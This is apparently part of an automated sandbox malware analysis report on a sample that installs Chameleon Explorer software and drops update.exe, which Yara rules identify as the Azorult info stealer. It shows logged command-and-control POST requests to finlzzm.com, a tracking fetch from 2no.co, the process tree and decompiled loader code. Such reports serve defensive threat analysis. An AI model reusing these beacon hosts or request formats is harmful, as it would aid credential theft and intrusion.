Nov 24, 2021 00:43:16.634727001 CET	1021	OUT	POST /index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: finlzzm.com Content-Length: 107 Cache-Control: no-cache Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 2f fb 39 2f fb 35 2f fb 35 2f fb 3b 2f fb 38 4b ed 3e 3f ed 3f 4e 8b 28 39 f1 28 39 f1 28 39 f1 28 39 f1 48 4f ed 3e 3e ed 3e 3a Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8K/9/5/5/;/8K>??N(9(9(9(9HO>>>:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49745	35.205.61.67	80	C:\Users\user\AppData\Roaming\update.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2021 00:43:19.890086889 CET	1022	OUT	POST /index.php HTTP/1.0 Host: finlzzm.com Connection: close User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Content-Length: 107 Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 2f fb 39 2f fb 35 2f fb 35 2f fb 3b 2f fb 38 4b ed 3e 3f ed 3f 4e 8b 28 39 f1 28 39 f1 28 39 f1 28 39 f1 48 4f ed 3e 3e ed 3e 3a Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8K/9/5/5/;/8K>??N(9(9(9(9HO>>>:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49746	142.250.203.115	80	C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2021 00:43:25.023572922 CET	1023	OUT	GET /static/?category=install&action=install&label=paid&uid=&prg=explorer HTTP/1.1 User-Agent: Chameleon Static (Ver: 3.0.0.505) Host: www.chameleon-managers.com Connection: Keep-Alive Cache-Control: no-cache
Nov 24, 2021 00:43:25.442241907 CET	1023	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Set-Cookie: cham_uid=60b9c0cce07334e8d8e321d0efeb9099; expires=Wed, 23-Nov-2022 23:43:25 GMT; Path=/ X-Cloud-Trace-Context: 1cfb2c9a511574bbbb797006c08a756c;o=1 Date: Tue, 23 Nov 2021 23:43:25 GMT Server: Google Frontend Content-Length: 32 Expires: Tue, 23 Nov 2021 23:43:25 GMT Data Raw: 36 30 62 39 63 30 63 63 65 30 37 33 33 34 65 38 64 38 65 33 32 31 64 30 65 66 65 62 39 30 39 39 Data Ascii: 60b9c0cce07334e8d8e321d0efeb9099

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49751	142.250.203.115	80	C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2021 00:44:00.732887030 CET	1156	OUT	GET /info/versions/ HTTP/1.1 User-Agent: Chameleon checker ( Ver: 3.0.0.505) Host: www.chameleon-managers.com Connection: Keep-Alive Cache-Control: no-cache
Nov 24, 2021 00:44:00.881139994 CET	1157	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Set-Cookie: cham_uid=2b5fcc5ba48c62997fa7a724b5c8520b; expires=Wed, 23-Nov-2022 23:44:00 GMT; Path=/ X-Cloud-Trace-Context: 3f1f1789f999fc9ecb55a3fe901a29f5;o=1 Date: Tue, 23 Nov 2021 23:44:00 GMT Server: Google Frontend Content-Length: 470 Expires: Tue, 23 Nov 2021 23:44:00 GMT Data Raw: 3c 3f 0a 24 73 74 61 72 74 75 70 5f 66 75 6c 6c 5f 76 65 72 5f 64 61 64 61 67 6f 6f 3d 22 33 2e 32 2e 30 2e 37 31 32 22 3b 0a 24 73 74 61 72 74 75 70 5f 66 75 6c 6c 5f 76 65 72 3d 22 34 2e 30 2e 30 2e 39 31 34 22 3b 0a 24 73 74 61 72 74 75 70 5f 62 65 74 61 5f 76 65 72 3d 22 34 2e 30 2e 30 2e 39 31 34 22 3b 0a 24 77 69 6e 64 6f 77 5f 66 75 6c 6c 5f 76 65 72 3d 22 32 2e 32 2e 30 2e 34 32 38 22 3b 0a 24 77 69 6e 64 6f 77 5f 62 65 74 61 5f 76 65 72 3d 22 32 2e 32 2e 30 2e 34 32 38 22 3b 0a 24 74 61 73 6b 5f 66 75 6c 6c 5f 76 65 72 3d 22 34 2e 30 2e 30 2e 37 38 32 22 3b 0a 24 74 61 73 6b 5f 62 65 74 61 5f 76 65 72 3d 22 34 2e 30 2e 30 2e 37 38 32 22 3b 0a 24 65 78 70 6c 6f 72 65 72 5f 66 75 6c 6c 5f 76 65 72 3d 22 33 2e 30 2e 30 2e 35 30 30 22 3b 0a 24 65 78 70 6c 6f 72 65 72 5f 62 65 74 61 5f 76 65 72 3d 22 33 2e 30 2e 30 2e 35 30 30 22 3b 0a 24 76 6f 6c 75 6d 65 5f 66 75 6c 6c 5f 76 65 72 3d 22 31 2e 30 2e 30 2e 31 33 32 22 3b 0a 24 76 6f 6c 75 6d 65 5f 62 65 74 61 5f 76 65 72 3d 22 31 2e 30 2e 30 2e 31 33 32 22 3b 0a 24 73 68 75 74 64 6f 77 6e 5f 66 75 6c 6c 5f 76 65 72 3d 22 31 2e 32 2e 32 2e 34 30 22 3b 0a 24 73 68 75 74 64 6f 77 6e 5f 62 65 74 61 5f 76 65 72 3d 22 31 2e 32 2e 32 2e 34 30 22 3b 0a 24 66 6f 6c 64 65 72 5f 66 75 6c 6c 5f 76 65 72 3d 22 32 2e 30 2e 31 30 2e 34 30 30 22 3b 0a 24 66 6f 6c 64 65 72 5f 62 65 74 61 5f 76 65 72 3d 22 32 2e 30 2e 31 30 2e 34 30 30 22 3b 0a 3f 3e Data Ascii: <?$startup_full_ver_dadagoo="3.2.0.712";$startup_full_ver="4.0.0.914";$startup_beta_ver="4.0.0.914";$window_full_ver="2.2.0.428";$window_beta_ver="2.2.0.428";$task_full_ver="4.0.0.782";$task_beta_ver="4.0.0.782";$explorer_full_ver="3.0.0.500";$explorer_beta_ver="3.0.0.500";$volume_full_ver="1.0.0.132";$volume_beta_ver="1.0.0.132";$shutdown_full_ver="1.2.2.40";$shutdown_beta_ver="1.2.2.40";$folder_full_ver="2.0.10.400";$folder_beta_ver="2.0.10.400";?>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49743	5.9.164.117	443	C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe

Timestamp	Direction	Data
2021-11-23 23:43:15 UTC	OUT	GET /1AiP77 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 2no.co
2021-11-23 23:43:15 UTC	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Nov 2021 23:43:15 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: close Set-Cookie: clhf03028ja=84.17.52.63; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=241337196; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Cache-Control: no-store, no-cache, must-revalidate Expires: Tue, 23 Nov 2021 23:43:15 +0000 Answers: whoami: f2c5cbdbdfb2acd321aa2e28a36ac4dd73a5c534bc9b6a2f720df5e3477c017b Strict-Transport-Security: max-age=31536000; preload X-Frame-Options: DENY
2021-11-23 23:43:15 UTC	IN	Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a 30 0d 0a 0d 0a Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49747	172.217.168.52	443	C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-23 23:43:26 UTC	0	OUT	GET /activation/4/?h_id=75254DF3C66AB052045780D3C643713C-1B3D82FF206F2697DB14BB5EE90B3A8D-DEE4D6E40AA7315F07804DDD9503F87B-E102E85C5423062DBFF8920ECFD0E53F-7E632307063B35A85D7B937531F0F205-7C15ED8E2F17D25630909AB97B3C48BC&vrs=3.0.0.505&prg=explorer&uid=60b9c0cce07334e8d8e321d0efeb9099 HTTP/1.1 User-Agent: Chameleon Checker NextGen2 (Ver: 3.0.0.505) Host: neosoft-activator.appspot.com Connection: Keep-Alive Cache-Control: no-cache
2021-11-23 23:43:28 UTC	1	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/plain;charset=utf-8 X-Cloud-Trace-Context: 707efefc181d836815d85cd899aebdea Date: Tue, 23 Nov 2021 23:43:28 GMT Server: Google Frontend Content-Length: 500 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-11-23 23:43:28 UTC	1	IN	Data Raw: 41 63 74 69 76 61 74 69 6f 6e 20 72 65 73 75 6c 74 0d 0a 56 61 6c 69 64 0d 0a 51 37 4d 66 42 46 52 30 58 6a 78 6d 69 41 58 35 43 53 5a 46 57 78 65 55 6d 4e 63 78 55 33 34 34 49 38 4e 2f 63 2f 6b 47 30 77 48 6d 73 6b 61 43 39 4b 6d 76 65 64 68 41 6d 4e 58 75 4e 78 33 37 54 79 30 78 31 65 6d 2f 55 4a 6c 63 45 71 30 66 4c 35 72 75 69 56 55 6d 48 73 47 76 69 6f 54 32 49 2b 32 67 6e 36 30 50 56 48 37 71 6f 67 37 50 66 69 65 56 59 78 58 6e 32 4b 64 6c 38 49 34 6b 0d 0a 4a 46 4b 35 62 6f 35 76 47 6e 34 68 31 6f 4e 70 49 43 45 68 79 59 2f 43 6d 56 57 49 35 35 2b 4c 61 6b 6a 2b 30 49 7a 4b 41 57 69 6d 70 4a 4a 7a 79 73 47 4b 49 39 4e 35 4c 56 30 78 35 32 71 55 4c 63 6d 74 69 74 6a 32 61 4b 6e 48 2b 73 32 6e 4c 33 36 55 49 33 44 57 76 45 4b 76 4b 68 2f 42 69 78 47 Data Ascii: Activation resultValidQ7MfBFR0XjxmiAX5CSZFWxeUmNcxU344I8N/c/kG0wHmskaC9KmvedhAmNXuNx37Ty0x1em/UJlcEq0fL5ruiVUmHsGvioT2I+2gn60PVH7qog7PfieVYxXn2Kdl8I4kJFK5bo5vGn4h1oNpICEhyY/CmVWI55+Lakj+0IzKAWimpJJzysGKI9N5LV0x52qULcmtitj2aKnH+s2nL36UI3DWvEKvKh/BixG

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe PID: 4668 Parent PID: 3608

General

Start time:	00:43:03
Start date:	24/11/2021
Path:	C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe"
Imagebase:	0x3e0000
File size:	7666176 bytes
MD5 hash:	56DB11A012B50B84E5C527F3D9D9CD89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cexplorer.exe PID: 6748 Parent PID: 4668

General

Start time:	00:43:11
Start date:	24/11/2021
Path:	C:\Users\user\AppData\Roaming\cexplorer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
Imagebase:	0x400000
File size:	6860752 bytes
MD5 hash:	B2E5A8FE3CA4F0CD681B5662F972EA5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: cexplorer.tmp PID: 6744 Parent PID: 6748

General

Start time:	00:43:12
Start date:	24/11/2021
Path:	C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp" /SL5="$C025E,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
Imagebase:	0x400000
File size:	1185824 bytes
MD5 hash:	729BC0108BCD7EC083DFA83D7A4577F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000007.00000003.389900078.00000000051B2000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: update.exe PID: 5720 Parent PID: 4668

General

Start time:	00:43:14
Start date:	24/11/2021
Path:	C:\Users\user\AppData\Roaming\update.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\update.exe"
Imagebase:	0x400000
File size:	206336 bytes
MD5 hash:	1286DF675C3878D0FC4A89FCCD98CE86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: Azorult_1, Description: Azorult Payload, Source: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000008.00000003.308603193.0000000000460000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000008.00000003.308603193.0000000000460000.00000004.00000001.sdmp, Author: Joe Security Rule: Azorult_1, Description: Azorult Payload, Source: 00000008.00000003.308603193.0000000000460000.00000004.00000001.sdmp, Author: kevoreilly
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: ChameleonExplorer.exe PID: 7060 Parent PID: 6744

General

Start time:	00:43:22
Start date:	24/11/2021
Path:	C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /trialregister
Imagebase:	0x400000
File size:	15091304 bytes
MD5 hash:	92A3D0847FC622B31F2D0C273A676C0E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: ChameleonExplorer.exe PID: 6856 Parent PID: 6744

General

Start time:	00:43:31
Start date:	24/11/2021
Path:	C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /replaceexplorer
Imagebase:	0x400000
File size:	15091304 bytes
MD5 hash:	92A3D0847FC622B31F2D0C273A676C0E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: ChameleonFolder.exe PID: 3372 Parent PID: 6744

General

Start time:	00:43:36
Start date:	24/11/2021
Path:	C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /update
Imagebase:	0x400000
File size:	4644456 bytes
MD5 hash:	5B0AE3FAC33C08145DCA4A9C272EBC34
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: ChameleonFolder.exe PID: 3212 Parent PID: 664

General

Start time:	00:43:39
Start date:	24/11/2021
Path:	C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
Imagebase:	0x400000
File size:	4644456 bytes
MD5 hash:	5B0AE3FAC33C08145DCA4A9C272EBC34
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: ChameleonExplorer.exe PID: 760 Parent PID: 6744

General

Start time:	00:43:42
Start date:	24/11/2021
Path:	C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /update
Imagebase:	0x400000
File size:	15091304 bytes
MD5 hash:	92A3D0847FC622B31F2D0C273A676C0E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: ChameleonFolder64.exe PID: 7068 Parent PID: 3212

General

Start time:	00:43:43
Start date:	24/11/2021
Path:	C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe" 590118
Imagebase:	0x400000
File size:	146536 bytes
MD5 hash:	246AAA95ABDDFD76F9166A2DAA9F2D73
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: ChameleonExplorer.exe PID: 6428 Parent PID: 3352

General

Start time:	00:43:46
Start date:	24/11/2021
Path:	C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
Imagebase:	0x400000
File size:	15091304 bytes
MD5 hash:	92A3D0847FC622B31F2D0C273A676C0E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: ChameleonFolder.exe PID: 6228 Parent PID: 3352

General

Start time:	00:43:54
Start date:	24/11/2021
Path:	C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup
Imagebase:	0x400000
File size:	4644456 bytes
MD5 hash:	5B0AE3FAC33C08145DCA4A9C272EBC34
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: ChameleonFolder.exe PID: 7116 Parent PID: 6428

General

Start time:	00:43:55
Start date:	24/11/2021
Path:	C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
Imagebase:	0x400000
File size:	4644456 bytes
MD5 hash:	5B0AE3FAC33C08145DCA4A9C272EBC34
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: ChameleonFolder.exe PID: 6404 Parent PID: 664

General

Start time:	00:43:55
Start date:	24/11/2021
Path:	C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
Imagebase:	0x400000
File size:	4644456 bytes
MD5 hash:	5B0AE3FAC33C08145DCA4A9C272EBC34
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: ChameleonFolder.exe PID: 5976 Parent PID: 664

General

Start time:	00:43:58
Start date:	24/11/2021
Path:	C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
Imagebase:	0x400000
File size:	4644456 bytes
MD5 hash:	5B0AE3FAC33C08145DCA4A9C272EBC34
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: ChameleonExplorer.exe PID: 5380 Parent PID: 3352

General

Start time:	00:44:02
Start date:	24/11/2021
Path:	C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
Imagebase:	0x400000
File size:	15091304 bytes
MD5 hash:	92A3D0847FC622B31F2D0C273A676C0E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: ChameleonFolder.exe PID: 5756 Parent PID: 3352

General

Start time:	00:44:11
Start date:	24/11/2021
Path:	C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup
Imagebase:	0x400000
File size:	4644456 bytes
MD5 hash:	5B0AE3FAC33C08145DCA4A9C272EBC34
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: ChameleonFolder.exe PID: 5012 Parent PID: 664

General

Start time:	00:44:12
Start date:	24/11/2021
Path:	C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
Imagebase:	0x400000
File size:	4644456 bytes
MD5 hash:	5B0AE3FAC33C08145DCA4A9C272EBC34
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: cexplorer.exe PID: 6748 Parent PID: 4668 cexplorer.exeCOMMON

Executed Functions

Function 004110C4, Relevance: 42.2, APIs: 7, Strings: 17, Instructions: 160
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E004110C4(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				long _t37;
				_Unknown_base(*)()* _t40;
				_Unknown_base(*)()* _t41;
				_Unknown_base(*)()* _t44;
				signed int _t49;
				void* _t105;
				void* _t106;
				intOrPtr _t122;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				struct HINSTANCE__* _t140;
				intOrPtr* _t142;
				intOrPtr _t144;
				intOrPtr _t145;

				_t144 = _t145;
				_t106 = 6;
				do {
					_push(0);
					_push(0);
					_t106 = _t106 - 1;
				} while (_t106 != 0);
				_push(_t106);
				_push(_t144);
				_push(0x41131e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t145;
				 *0x415b58 =  *0x415b58 - 1;
				if( *0x415b58 >= 0) {
					L19:
					_pop(_t122);
					 *[fs:eax] = _t122;
					_push(E00411325);
					return L00404C90( &_v56, 0xd);
				}
				_t140 = GetModuleHandleW(L"kernel32.dll");
				_t37 = GetVersion();
				_t105 = 0;
				if(_t37 != 0x600) {
					_t142 = GetProcAddress(_t140, "SetDefaultDllDirectories");
					if(_t142 != 0) {
						 *_t142(0x800);
						asm("sbb ebx, ebx");
						_t105 = 1;
					}
				}
				if(_t105 == 0) {
					_t44 = GetProcAddress(_t140, "SetDllDirectoryW");
					if(_t44 != 0) {
						 *_t44(0x411378);
					}
					E0040699C( &_v8);
					E00404C98(0x415b5c, _v8);
					if( *0x415b5c != 0) {
						_t49 =  *0x415b5c; // 0x0
						if(_t49 != 0) {
							_t49 =  *(_t49 - 4);
						}
						_t125 =  *0x415b5c; // 0x0
						if( *((short*)(_t125 + _t49 * 2 - 2)) != 0x5c) {
							E00404F98(0x415b5c, 0x411388);
						}
						_t126 =  *0x415b5c; // 0x0
						E00405058( &_v12, L"uxtheme.dll", _t126);
						E004069C8(_v12, _t105);
						_t127 =  *0x415b5c; // 0x0
						E00405058( &_v16, L"userenv.dll", _t127);
						E004069C8(_v16, _t105);
						_t128 =  *0x415b5c; // 0x0
						E00405058( &_v20, L"setupapi.dll", _t128);
						E004069C8(_v20, _t105);
						_t129 =  *0x415b5c; // 0x0
						E00405058( &_v24, L"apphelp.dll", _t129);
						E004069C8(_v24, _t105);
						_t130 =  *0x415b5c; // 0x0
						E00405058( &_v28, L"propsys.dll", _t130);
						E004069C8(_v28, _t105);
						_t131 =  *0x415b5c; // 0x0
						E00405058( &_v32, L"dwmapi.dll", _t131);
						E004069C8(_v32, _t105);
						_t132 =  *0x415b5c; // 0x0
						E00405058( &_v36, L"cryptbase.dll", _t132);
						E004069C8(_v36, _t105);
						_t133 =  *0x415b5c; // 0x0
						E00405058( &_v40, L"oleacc.dll", _t133);
						E004069C8(_v40, _t105);
						_t134 =  *0x415b5c; // 0x0
						E00405058( &_v44, L"version.dll", _t134);
						E004069C8(_v44, _t105);
						_t135 =  *0x415b5c; // 0x0
						E00405058( &_v48, L"profapi.dll", _t135);
						E004069C8(_v48, _t105);
						_t136 =  *0x415b5c; // 0x0
						E00405058( &_v52, L"comres.dll", _t136);
						E004069C8(_v52, _t105);
						_t137 =  *0x415b5c; // 0x0
						E00405058( &_v56, L"clbcatq.dll", _t137);
						E004069C8(_v56, _t105);
					}
				}
				_t40 = GetProcAddress(_t140, "SetSearchPathMode");
				if(_t40 != 0) {
					 *_t40(0x8001);
				}
				_t41 = GetProcAddress(_t140, "SetProcessDEPPolicy");
				if(_t41 != 0) {
					 *_t41(1); // executed
				}
				goto L19;
			}

0x004110c5
0x004110c7
0x004110cc
0x004110cc
0x004110ce
0x004110d0
0x004110d0
0x004110d3
0x004110d9
0x004110da
0x004110df
0x004110e2
0x004110e5
0x004110ec
0x00411303
0x00411305
0x00411308
0x0041130b
0x0041131d
0x0041131d
0x004110fc
0x004110fe
0x00411105
0x0041110b
0x00411118
0x0041111c
0x00411123
0x00411128
0x0041112a
0x0041112a
0x0041111c
0x0041112d
0x00411139
0x00411140
0x00411147
0x00411147
0x0041114c
0x00411159
0x00411165
0x0041116b
0x00411172
0x00411177
0x00411177
0x00411179
0x00411185
0x00411191
0x00411191
0x0041119e
0x004111a4
0x004111ac
0x004111b9
0x004111bf
0x004111c7
0x004111d4
0x004111da
0x004111e2
0x004111ef
0x004111f5
0x004111fd
0x0041120a
0x00411210
0x00411218
0x00411225
0x0041122b
0x00411233
0x00411240
0x00411246
0x0041124e
0x0041125b
0x00411261
0x00411269
0x00411276
0x0041127c
0x00411284
0x00411291
0x00411297
0x0041129f
0x004112ac
0x004112b2
0x004112ba
0x004112c7
0x004112cd
0x004112d5
0x004112d5
0x00411165
0x004112e0
0x004112e7
0x004112ee
0x004112ee
0x004112f6
0x004112fd
0x00411301
0x00411301
0x00000000

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,00000000,0041131E,?,?,?,?,00000005,00000000,00000000), ref: 004110F7
GetVersion.KERNEL32(kernel32.dll,00000000,0041131E,?,?,?,?,00000005,00000000,00000000), ref: 004110FE
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00411113
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00411139

Part of subcall function 004069C8: SetErrorMode.KERNEL32(00008000), ref: 004069D6
Part of subcall function 004069C8: LoadLibraryW.KERNEL32(00000000,00000000,00406A20,?,00000000,00406A3E,?,00008000), ref: 00406A05

GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004112E0
GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004112F6
SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,00000000,0041131E,?,?,?,?,00000005,00000000,00000000), ref: 00411301

Strings

oleacc.dll, xrefs: 00411256
uxtheme.dll, xrefs: 00411199
profapi.dll, xrefs: 0041128C
version.dll, xrefs: 00411271
dwmapi.dll, xrefs: 00411220
comres.dll, xrefs: 004112A7
SetDllDirectoryW, xrefs: 00411133
SetDefaultDllDirectories, xrefs: 0041110D
apphelp.dll, xrefs: 004111EA
SetProcessDEPPolicy, xrefs: 004112F0
clbcatq.dll, xrefs: 004112C2
userenv.dll, xrefs: 004111B4
SetSearchPathMode, xrefs: 004112DA
